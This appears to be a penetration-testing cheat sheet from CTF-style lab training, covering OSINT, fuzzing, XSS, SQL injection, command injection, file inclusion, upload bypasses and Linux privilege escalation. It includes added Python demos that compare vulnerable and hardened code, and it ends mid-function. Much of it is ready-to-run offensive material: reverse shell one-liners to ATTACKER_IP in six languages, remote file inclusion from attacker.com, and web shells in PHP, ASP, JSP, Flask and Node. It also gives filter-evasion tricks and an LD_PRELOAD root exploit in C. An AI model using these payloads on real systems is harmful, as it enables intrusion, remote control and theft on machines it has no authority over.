VirusTotal to check whether a site is trustworthy; can also be used for files
OpenPhish for real-time phishing threats
PhishTank to report a site and to check whether it is a known phishing site
emkei.cz: online fake mailer (sends email with a spoofed sender)
msfvenom
Direction: define the goal, scope and priorities of the operation
Collection: gather information (websites, social networks, public databases, etc.)
Analysis: detailed examination of the collected information
Evaluation: assess and interpret the leads
Dissemination: share the findings and reports with others
Google dorks (operator - description - example):
site:        search within a specific site                       site:example.com
filetype:    search for a specific file type                     filetype:pdf
intitle:     pages with the given words in the title             intitle:"login"
inurl:       pages with the given words in the URL               inurl:admin
cache:       Google's cached copy of a page                      cache:example.com
link:        pages that link to a given page                     link:example.com
related:     sites similar to a given site                       related:example.com
intext:      pages containing the words in the body text         intext:"password"
allintitle:  pages with all the words in the title               allintitle:login admin
allinurl:    pages with all the words in the URL                 allinurl:admin login
allintext:   pages with all the words in the body text           allintext:username password
define:      definition of a word                                define:OSINT
"keyword"    exact phrase                                        "admin login"
-keyword     exclude pages containing a word                     password -example
OR           pages containing either of two words                login OR signup
*            wildcard for any word                               intitle:"admin *"
..           numbers within a range                              filetype:pdf 2020..2022
info:        information about a site                            info:example.com
maps:        map of a location                                   maps:New York
stocks:      stock information for a company                     stocks:GOOG
Note: cache:, link: and info: have since been retired by Google and no longer return results; the GHDB entries below rely on the other operators.
Google Hacking Database (GHDB)
instantusername.com to find the social networks where a username is registered
Sherlock: same
RocketReach to find professional information such as email addresses, phone numbers, social networks...
Google reverse image search
Finding Similar Human Faces to find images using facial recognition
exiftool
whois
DNSdumpster gives information about a domain
host
dig
Shodan to search internet-exposed devices (IoT); it is a search engine over scan results, it does not scan on demand
Hunter to find and verify email addresses
email checker to verify that an email address exists and is deliverable
Ahmia to find .onion sites
Deep Web Technologies: a platform for searching academic resources on the deep web
See OSINT Framework
msfconsole: launches Metasploit
search: search for a module
use: select a module
info: details about a module
options: show the module's options and which ones are required
show: show other information (show payloads, show targets, ...)
set: set an option value
get: show an option value
unset: clear an option
run / exploit: run the module
back: leave the current module
sessions: list and interact with active sessions
RHOST: target machine
LHOST: attacker's (current) machine
show evasion: list evasion modules
Post-exploitation is possible:
background the current session (Ctrl+Z, or the background command), then use post/linux/gather/enum_system, set SESSION <id> and run it
Browser extensions: Wappalyzer and WhatRuns to identify the technologies in use
DNSdumpster (online)
host
dig
Censys search: shows the SSL/TLS certificates issued for a domain
crt.sh: same (certificate transparency logs)
gobuster dns -d example.com -w /path/to/wordlist
gobuster vhost -u https://example.com -w /path/to/wordlist
ffuf -w /path/to/wordlist -u https://example.com -H 'Host: FUZZ.example.com' for virtual hosts
ffuf -w /path/to/vhost/wordlist -u http://example.com -H 'Host: FUZZ.example.com' -fs 4242 (-fs filters out HTTP responses of the given size, i.e. the default page returned for every unknown vhost)
gobuster vhost -u https://example.com -w /path/to/wordlist --exclude-length 1542 (same idea as -fs)
gobuster dir -u http://example.com -w /path/to/wordlist.txt
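Added example (not from the original notes): what the ffuf/gobuster vhost commands above actually do. It starts a constructed local HTTP server that answers every unknown Host header with the same default page and a hidden vhost admin.example.com with a different one, sends GET / with a forged Host header for each word, measures a baseline response size with a label that cannot exist, and keeps only candidates whose size differs, which is the -fs / --exclude-length filter. The domain, wordlist and page bodies are assumptions for the demo.

```python
import http.client
import http.server
import threading

# Constructed stand-in for the target: serves one "default" page to any Host
# header it does not know, and a different page for the hidden vhost
# admin.example.com. Domain, bodies and port are assumptions for the demo.
DOMAIN = "example.com"
DEFAULT_BODY = b"<html><body><h1>It works!</h1></body></html>"
ADMIN_BODY = b"<html><body><h1>Admin portal</h1><form>...</form></body></html>"
VHOSTS = {"admin." + DOMAIN: ADMIN_BODY}


class VHostHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = VHOSTS.get(self.headers.get("Host", ""), DEFAULT_BODY)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_target():
    """Start the fake target on a free loopback port; returns the server."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(ip, port, host_header):
    """One GET / with a forged Host header (what ffuf -H 'Host: FUZZ...' sends).
    Returns (status code, response body size)."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": host_header})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def fuzz_vhosts(ip, port, domain, wordlist):
    """Equivalent of: ffuf -u http://ip:port -H 'Host: FUZZ.domain' -fs <baseline>.
    The baseline is measured with a label that cannot exist, so every candidate
    whose response size equals it is the catch-all default and is filtered out."""
    _, baseline = probe(ip, port, "zz-baseline-probe-1337." + domain)
    hits = []
    for word in wordlist:
        candidate = f"{word}.{domain}"
        status, size = probe(ip, port, candidate)
        if size != baseline:  # same idea as -fs / --exclude-length
            hits.append((candidate, status, size))
    return hits


def demo():
    """Run the fuzzer against the constructed target; returns the hits."""
    srv = start_target()
    try:
        return fuzz_vhosts("127.0.0.1", srv.server_port, DOMAIN,
                           ["www", "admin", "dev", "staging"])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for host, status, size in demo():
        print(f"[+] {host}  status={status}  size={size}")
```

Filtering on size alone is the weak spot of this technique: a vhost whose page happens to be the same length as the default is missed, and a default page with dynamic content (timestamps, CSRF tokens) makes every candidate look different, which is why ffuf also offers -fw (words), -fl (lines) and -fr (regex) filters.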
theHarvester: OSINT tool collecting email addresses, subdomains, IP addresses, etc.
check robots.txt and sitemap.xml
Directory and file brute force:
gobuster
ffuf -u http://target.com/FUZZ -w <wordlist>
dirb
feroxbuster -u <url> -w <wordlist>
ffuf -u https://example.com/FUZZ -w /path/to/wordlist.txt
gobuster dir -u https://example.com -w /path/to/wordlist.txt -x php,html,asp (-x appends these extensions to each word)
Subdomains and virtual hosts:
ffuf -u https://FUZZ.example.com -w /path/to/wordlist.txt -H "Host: FUZZ.example.com" (each candidate must resolve in DNS)
sublist3r -d example.com -o subdomains.txt
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w /path/to/wordlist.txt (vhosts that are not in DNS)
gobuster vhost -u https://example.com -w /path/to/wordlist.txt
Parameter and credential fuzzing:
ffuf -u "https://example.com/page.php?param=FUZZ" -w /path/to/wordlist.txt
ffuf -u "https://example.com/login.php" -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -H "Content-Type: application/x-www-form-urlencoded"
sessionStorage
localStorage
XMLHttpRequest
document.cookie
https://example.com/home?search=<script>alert('XSS')</script>
<script>alert(1)</script>
<h1 style="color:green;">TEST</h1>
POST /index.php HTTP/1.1
Host: example.com
Cookie: PHPSESSID=jl5kamgcplionfan0kkjhcujh3
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36

message=<script>alert(document.cookie)</script>
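Added example (not from the original notes): the reflected ?search= handler from the URLs above written twice, once reflecting the parameter raw and once HTML-escaped, plus the Set-Cookie header that makes document.cookie useless to an injected script (HttpOnly). The page template and the session id are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# Constructed payloads: the reflected parameter from the URLs above and the
# cookie-stealing body from the POST request.
REFLECTED = "<script>alert('XSS')</script>"
COOKIE_THEFT = "<script>alert(document.cookie)</script>"


def render_search_vulnerable(search):
    """Reflects ?search= straight into the page: active HTML is executed."""
    return f"<html><body><p>Results for {search}</p></body></html>"


def render_search_safe(search):
    """Escapes for an HTML text context; the payload is displayed, not run."""
    escaped = html.escape(search, quote=True)
    return f"<html><body><p>Results for {escaped}</p></body></html>"


def session_cookie(session_id, http_only=True):
    """Set-Cookie value for PHPSESSID. With HttpOnly, document.cookie from an
    injected script cannot read it (the XSS can still act as the user, so this
    limits theft, it does not fix the injection)."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["httponly"] = http_only
    c["PHPSESSID"]["secure"] = True
    c["PHPSESSID"]["samesite"] = "Lax"
    return c["PHPSESSID"].OutputString()


def contains_active_script(page):
    """Crude detector used by the demo: an unescaped <script> tag in the output."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(COOKIE_THEFT))
    print(render_search_safe(COOKIE_THEFT))
    print("Set-Cookie:", session_cookie("jl5kamgcplionfan0kkjhcujh3"))
```

html.escape is correct only for the HTML text and attribute contexts; a value reflected inside a <script> block, a URL or an event handler needs the encoding of that context instead.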
Connect to a database: mysql -u root -p
list databases: show databases;
select a database: use db_name;
list tables: show tables;
insert into a table: INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...);
comments: -- (followed by a space), # or /* */ (# is MySQL-only)
authentication bypass: ' OR 1=1#
UNION-based extraction (the number of columns must match the original query): FORD' UNION SELECT USER(),DATABASE(),VERSION(),4 #
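Added example (not from the original notes): the two payloads above run against a constructed in-memory SQLite database, with the vulnerable string-built queries next to the parameterized fix. SQLite only knows the -- comment and has no USER()/DATABASE()/VERSION(), so -- replaces the MySQL # and sqlite_version() stands in for VERSION(); the tables and rows are invented for the demo.

```python
import sqlite3


def build_db():
    """Constructed sample database for the demo (not from the original notes)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!', 'admin'), (2, 'bob', 'hunter2', 'user');
        CREATE TABLE cars (id INTEGER, make TEXT, model TEXT, year INTEGER);
        INSERT INTO cars VALUES (1, 'FORD', 'Focus', 2019), (2, 'BMW', 'i3', 2021);
    """)
    return db


def login_vulnerable(db, username, password):
    """User input is concatenated into the SQL text, so it becomes SQL grammar."""
    sql = (f"SELECT id, username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchall()


def search_cars_vulnerable(db, make):
    """Same flaw on a 4-column SELECT: a UNION payload must also yield 4 columns."""
    sql = f"SELECT id, make, model, year FROM cars WHERE make = '{make}'"
    return db.execute(sql).fetchall()


def login_safe(db, username, password):
    """Parameterized query: the driver binds the values, they are never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


# Payloads mirroring the notes above (-- instead of #, sqlite_version() for VERSION()).
BYPASS = "' OR 1=1-- "
UNION = ("FORD' UNION SELECT 1, sqlite_version(), "
         "username || ':' || password, 4 FROM users-- ")

if __name__ == "__main__":
    db = build_db()
    print("bypass :", login_vulnerable(db, BYPASS, "anything"))
    print("union  :", search_cars_vulnerable(db, UNION))
    print("safe   :", login_safe(db, BYPASS, "anything"))
```

The bypass works because the closing quote ends the string literal and -- discards the password check; the UNION payload works because the injected SELECT returns the same number of columns as the original, which is exactly what sqlmap brute-forces when it determines the column count.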
-u: target URL
--data: POST data to send
-p: parameter to test
sqlmap -u "https://prepared-smasher.europe1.hackviser.space/login.php" --data="username=test&password=test" -p "username"
--current-user: database user in use
--current-db: database in use
--passwords: dump the password hashes of the database users
--dbs: list all databases
--tables: list the tables (with -D to specify the database)
--columns: list the columns of a table (with -D for the database and -T for the table)
--dump: dump the data (same, with -D/-T)
Commands can also be injected through a request header, here time-based:
User-Agent: '; sleep 10'
attacker machine (listener): nc -lvp 4444
target machine:
Netcat: nc -e /bin/sh ATTACKER_IP 4444 (needs a netcat build that supports -e, e.g. nc.traditional)
Bash: bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Perl: perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>
PowerShell: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
SSTI (Twig): {{['nc -nlvp 4444 -e /bin/bash']|filter('system')}} starts a bind shell on the target; then connect from the attacker machine with nc -nv TARGET_IP 4444
Some applications strip whitespace; ${IFS} (the shell's field separator, a space by default) replaces it: ls${IFS}/etc/passwd
Some commands are blacklisted; split the keyword with quotes so the filter does not see it: w'h'o'am'i or w"h"o"am"i
Other variants: who$()ami, who`echo am`i
commix (automated command injection): git clone https://github.com/commixproject/commix.git commix
target URL: --url="http://example.com/index.php"
parameters: --data="command=test"
HTTP method: --method=POST
http://example.com/index.php?page=../../../../etc/passwd
Log poisoning: send PHP in a header that is written to a log file, then include that log file through the LFI:
GET /index.php HTTP/1.1
User-Agent: <?php system('ls'); ?>
php filter (returns the source instead of executing it): http://example.com/index.php?page=php://filter/convert.base64-encode/resource=home.php
then base64-decode the response
If the site blocks ../ path traversal, use ....// (a filter that strips ../ once leaves ../ behind)
URL encoding: ../ becomes %2e%2e%2f; try double encoding (%252e%252e%252f) if the filter is stricter
null byte injection (PHP before 5.3.4): https://example.com/index.php?language=/etc/passwd%00
Remote file inclusion: https://example.com/index.php?page=https://attacker.com/shell.php
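Added example (not from the original notes): the traversal bypasses above run through a constructed emulation of include($_GET['page']) sitting behind a weak "strip ../" filter (with the common bug of decoding the parameter a second time, which is what double encoding exploits, and the C-string truncation old PHP did on a null byte), next to a resolver that canonicalises the path and refuses anything outside the web root. The web root /var/www/html/pages and the payload names are assumptions for the demo.

```python
import os
import urllib.parse


def resolve_vulnerable(base_dir, raw_param):
    """Emulates include($_GET['page']) behind a weak filter:
    1. the web server decodes the query string once (PHP does this for $_GET),
    2. the filter strips '../' a single time,
    3. the app decodes again (common bug; this is what double encoding exploits),
    4. the C-level open() stops at the first null byte (PHP before 5.3.4),
    5. os.path.join discards base_dir for an absolute path, like include does."""
    once = urllib.parse.unquote(raw_param)
    filtered = once.replace("../", "")
    decoded = urllib.parse.unquote(filtered)
    decoded = decoded.split("\x00", 1)[0]
    return os.path.normpath(os.path.join(base_dir, decoded))


def resolve_safe(base_dir, raw_param):
    """Decode once, reject null bytes, canonicalise, then require the result to
    stay inside base_dir. Any encoding of '../' and any absolute path fails."""
    decoded = urllib.parse.unquote(raw_param)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, decoded))
    if os.path.commonpath([real_base, candidate]) != real_base:
        raise ValueError("path traversal blocked")
    return candidate


BASE = "/var/www/html/pages"  # assumed web root for the demo

# Constructed payloads mirroring the notes above.
PAYLOADS = {
    "plain":          "../../../../etc/passwd",
    "double-dot":     "....//....//....//....//etc/passwd",
    "url-encoded":    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "double-encoded": "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "absolute":       "/etc/passwd",
    "null-byte":      "/etc/passwd%00",
}


def run_payloads():
    """Returns {name: (path the vulnerable resolver opens, safe resolver result)}."""
    results = {}
    for name, p in PAYLOADS.items():
        vuln = resolve_vulnerable(BASE, p)
        try:
            safe = resolve_safe(BASE, p)
        except ValueError as e:
            safe = f"blocked: {e}"
        results[name] = (vuln, safe)
    return results


if __name__ == "__main__":
    for name, (vuln, safe) in run_payloads().items():
        print(f"{name:15} vulnerable -> {vuln}\n{'':15} safe       -> {safe}")
```

Note what the safe resolver does with ....// and the double-encoded payload: it does not "block" them, it simply resolves them to harmless file names under the web root, because canonicalising first and checking the prefix afterwards leaves nothing for an encoding trick to work on.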
Try different file types (jpg, pdf, php, exe, etc.)
Inject code into images
Change the MIME type of the file
Upload very large files
MIME type bypass: change the Content-Type header from text/php to image/png
POST / HTTP/1.1
Host: sunny-zombie.europe1.hackviser.space
Content-Length: 354
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6CZGdFhAqm0hjeeA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: image/png

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary6CZGdFhAqm0hjeeA--
Magic header bypass: prepend GIF89a; so the file passes a content check as a GIF
POST / HTTP/1.1
Host: included-aquagirl.europe1.hackviser.space
Content-Length: 354
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiXbT96o7HsUdrZoy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: text/php

GIF89a;
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryiXbT96o7HsUdrZoy--
file extension bypass: try the alternative extensions each server-side handler executes:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .phar
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
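Added example (not from the original notes): the two uploads from the requests above (cmd.php with a forged image/png Content-Type, and cmd.php with a GIF89a; prefix) evaluated against the two weak checks they each defeat, and against a hardened check that ignores the client's Content-Type, rejects any executable extension anywhere in the name (using the extension lists above), and requires the magic bytes to agree with the final extension. The file bodies and the legitimate PNG are constructed for the demo.

```python
import os

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Extensions a server-side handler would execute (from the lists in the notes above).
EXECUTABLE_EXT = {
    ".php", ".php2", ".php3", ".php4", ".php5", ".php6", ".php7", ".phps",
    ".pht", ".phtm", ".phtml", ".phar",
    ".asp", ".aspx", ".ashx", ".asmx", ".cshtml", ".vbhtml", ".asa", ".cer", ".shtml",
    ".jsp", ".jspx", ".jsw", ".jsv", ".jspf",
}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

PHP_SHELL = b"<?php\nif (isset($_GET['cmd'])) {\n    system($_GET['cmd']);\n}\n?>\n"

# The uploads from the requests above, as (filename, Content-Type, body); the
# last two are constructed for comparison.
MIME_BYPASS = ("cmd.php", "image/png", PHP_SHELL)
MAGIC_BYPASS = ("cmd.php", "text/php", b"GIF89a;\n" + PHP_SHELL)
LEGIT_PNG = ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
DOUBLE_EXT = ("cmd.php.png", "image/png", b"\x89PNG\r\n\x1a\n" + PHP_SHELL)


def check_content_type(filename, content_type, data):
    """Weak check 1: trusts the client-supplied Content-Type header."""
    return content_type.startswith("image/")


def check_magic_bytes(filename, content_type, data):
    """Weak check 2: only looks at the first bytes of the file."""
    return any(data.startswith(m) for m in MAGIC)


def check_hardened(filename, content_type, data):
    """Every extension in the name must be non-executable, the last one must be
    allow-listed, and the magic bytes must agree with it. Content-Type is ignored.
    This only decides accept/reject: the file must still be stored under a
    server-generated name where scripts are never executed."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    exts = ["." + p for p in parts[1:]]
    if any(e in EXECUTABLE_EXT for e in exts):
        return False  # cmd.php, cmd.php.png, shell.phtml ...
    ext = ".jpg" if exts[-1] == ".jpeg" else exts[-1]
    if ext not in ALLOWED_EXT:
        return False
    detected = next((t for m, t in MAGIC.items() if data.startswith(m)), None)
    return detected == ext


def evaluate(upload):
    """Which checks the upload passes."""
    return {
        "content-type": check_content_type(*upload),
        "magic-bytes": check_magic_bytes(*upload),
        "hardened": check_hardened(*upload),
    }


if __name__ == "__main__":
    for name, up in (("mime bypass", MIME_BYPASS), ("magic bypass", MAGIC_BYPASS),
                     ("legit png", LEGIT_PNG), ("double ext", DOUBLE_EXT)):
        print(f"{name:13}", evaluate(up))
```

A GIF89a; prefix followed by PHP still passes the hardened check if it is uploaded as cmd.gif: content inspection cannot tell a polyglot from an image, so the stored name and the no-execute storage location are what actually prevent execution.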
PHP
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
usage: http://example.com/shell.php?cmd=whoami
ASP
<%
If Request.QueryString("cmd") <> "" Then
    Set objShell = Server.CreateObject("WScript.Shell")
    Set objExec = objShell.Exec(Request.QueryString("cmd"))
    Set objOutput = objExec.StdOut
    Response.Write("<pre>" & objOutput.ReadAll() & "</pre>")
End If
%>
JSP
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s = "";
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = sI.readLine()) != null) {
        out.println(s);
    }
}
%>
PYTHON
import os
from flask import Flask, request

app = Flask(__name__)

@app.route('/shell', methods=['GET'])
def shell():
    cmd = request.args.get('cmd')
    if cmd:
        output = os.popen(cmd).read()
        return f"<pre>{output}</pre>"
    return "<pre>No command provided</pre>"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
NODE.JS
const express = require('express');
const { exec } = require('child_process');
const app = express();

app.get('/shell', (req, res) => {
    const cmd = req.query.cmd;
    if (cmd) {
        exec(cmd, (error, stdout, stderr) => {
            if (error) {
                res.send(`<pre>${stderr}</pre>`);
                return;
            }
            res.send(`<pre>${stdout}</pre>`);
        });
    } else {
        res.send('<pre>No command provided</pre>');
    }
});

app.listen(8080, '0.0.0.0', () => {
    console.log('Web shell running on port 8080');
});
Intruder is designed within Burp Suite to create customized attacks to automatically test for security vulnerabilities. It is particularly used for payload trials, fuzzing, and brute-force attacks on form or parameter fields. The Community edition rate-limits Intruder, so attacks run noticeably slower.
Repeater is a tool that allows manual modification and resending of requests. This feature is important during security testing to observe how the target application responds. Quickly viewing the results of changes made to requests can contribute to identifying security vulnerabilities.
Sequencer is a tool used to test the security of session tokens and other data used in web applications. Sequencer analyzes the randomness and unpredictability of these tokens, thereby assessing the likelihood that an attacker could carry out attacks such as session hijacking.
The Decoder tool in Burp Suite is used to analyze and transform encoded or obfuscated data. This tool simplifies the analysis of data encountered during security testing. In addition to decoding, it can encode data (URL, HTML, Base64, hex, ...) and compute hashes of it.
Comparer enables the comparison and analysis of differences between two or more data pieces. This tool is particularly useful during security testing to identify subtle differences between similar operations or to understand the structural differences between two different session tokens. Analyses performed with Comparer can assist in identifying security vulnerabilities and provide a better understanding of how an application behaves.
The Logger tool in Burp Suite keeps a record of all requests and responses that occur while Burp Suite is being used. This is crucial for examining the actions taken during security testing, debugging, and identifying potential security vulnerabilities.
Organizer is a tool designed to help systematically store findings, notes, and observations obtained during the testing process. This feature simplifies the management and reporting of information gathered about the application or systems being tested.
running processes: ps aux | grep root
users with a terminal: ps au (or w / who)
contents of the ssh directory: ls -l .ssh
command history: history
the user's sudo privileges: sudo -l
password hashes: cat /etc/shadow (needs root; /etc/passwd only lists the accounts and is worth reading for users and shells)
cron jobs: cat /etc/crontab
other storage: lsblk
world-writable directories: find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
world-writable files: find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
If sudo -l allows python3, get a root bash with: sudo python3 -c 'import os; os.system("/bin/bash")'
With a SUID python2.7 binary (sh -p keeps the elevated effective uid): python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions on misconfigured systems
example: here find has the SUID bit set. Launching bash from it (with -p so bash keeps the effective uid instead of dropping it) gives a root shell
user@hackerbox:~$ ls -l /usr/bin/find
-rwsr-xr-x 1 root root 311008 Jan 9 2021 /usr/bin/find
user@hackerbox:~$ find . -exec /bin/bash -p \; -quit
root💀hackerbox:~# id
uid=0(root) gid=0(root) groups=0(root)
When capabilities are set on a program, the program can perform certain privileged actions it could not perform without them.
setcap cap_net_bind_service=+ep /usr/bin/vim (example of such a grant; these are what we look for)
cap_sys_admin: actions with administrative privileges, such as modifying system files or system settings
cap_sys_chroot: change the root directory of the current process, granting access to otherwise inaccessible files and directories
cap_sys_ptrace: attach to and debug other processes, granting access to sensitive information or altering their behaviour
cap_sys_nice: raise or lower process priorities, granting access to resources that would otherwise be restricted
cap_sys_time: change the system clock, potentially manipulating timestamps or causing other processes to behave unexpectedly
cap_sys_resource: alter system resource limits, such as the maximum number of open file descriptors or the maximum amount of allocated memory
cap_sys_module: load and unload kernel modules, potentially altering the operating system's behaviour or gaining access to sensitive information
cap_net_bind_service: bind to privileged network ports (below 1024)
cap_dac_override: bypass file permission checks to access files
cap_sys_rawio: perform raw I/O operations
cap_net_raw: create RAW and PACKET sockets
cap_setuid: set the effective user ID of the process (including root's)
cap_setgid: set the effective group ID, which can be used to gain the privileges of another group (including root's)
whereis getcap
/usr/sbin/getcap -r / 2>/dev/null
The shared libraries required for a binary to run can be viewed using the ldd utility: ldd /bin/ping
Full example:
Here sudo -l shows that sys_backup can be run as root. Because the rule uses an absolute path, PATH hijacking is not possible, but sudo keeps LD_PRELOAD in the environment (env_keep+=LD_PRELOAD), so a library we preload will run as root before sys_backup does.
user@hackerbox:~$ sudo -l
Matching Defaults entries for user on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User user may run the following commands on debian:
    (ALL) NOPASSWD: /usr/local/bin/sys_backup
So we use LD_PRELOAD (escalate.c):
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs when the library is loaded (hence -nostartfiles below). */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-inject into the shell we spawn */
    setresuid(0, 0, 0);       /* real, effective and saved uid -> root */
    system("/bin/bash -p");
}
gcc -fPIC -shared -nostartfiles -o /tmp/escalate.so escalate.c
become root with: sudo LD_PRELOAD=/tmp/escalate.so /usr/local/bin/sys_backup
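Added example (not from the original notes): a small triage helper for the two enumeration outputs above. It parses a sudo -l listing for env_keep variables and the (runas, NOPASSWD, command) rules and reports which commands are usable for the LD_PRELOAD trick (sudo must keep LD_PRELOAD and the rule must run as root; the absolute path does not matter), and parses getcap -r output to flag binaries carrying capabilities that lead to root. The sample outputs are constructed (modelled on the listing above plus extra rules and both getcap output styles); the extra paths and the DANGEROUS_CAPS selection are assumptions.

```python
import re

# Capabilities that, on their own, typically lead to root (a subset of the list above).
DANGEROUS_CAPS = {"cap_sys_admin", "cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
                  "cap_chown", "cap_fowner"}

# Constructed sample output: the sudo -l listing above plus two extra rules,
# and a getcap listing mixing the old "path = caps" and new "path caps" formats.
SUDO_L_SAMPLE = """Matching Defaults entries for user on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, env_keep+=LD_PRELOAD

User user may run the following commands on debian:
    (ALL) NOPASSWD: /usr/local/bin/sys_backup
    (root) /usr/bin/python3
    (www-data) NOPASSWD: /usr/bin/systemctl status apache2
"""

GETCAP_SAMPLE = """/usr/bin/ping = cap_net_raw+ep
/usr/bin/vim = cap_net_bind_service+ep
/usr/bin/python3.9 cap_setuid=ep
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")


def parse_sudo_l(text):
    """Extracts env_keep variables and the (runas, NOPASSWD, command) rules."""
    env_keep, rules = [], []
    for line in text.splitlines():
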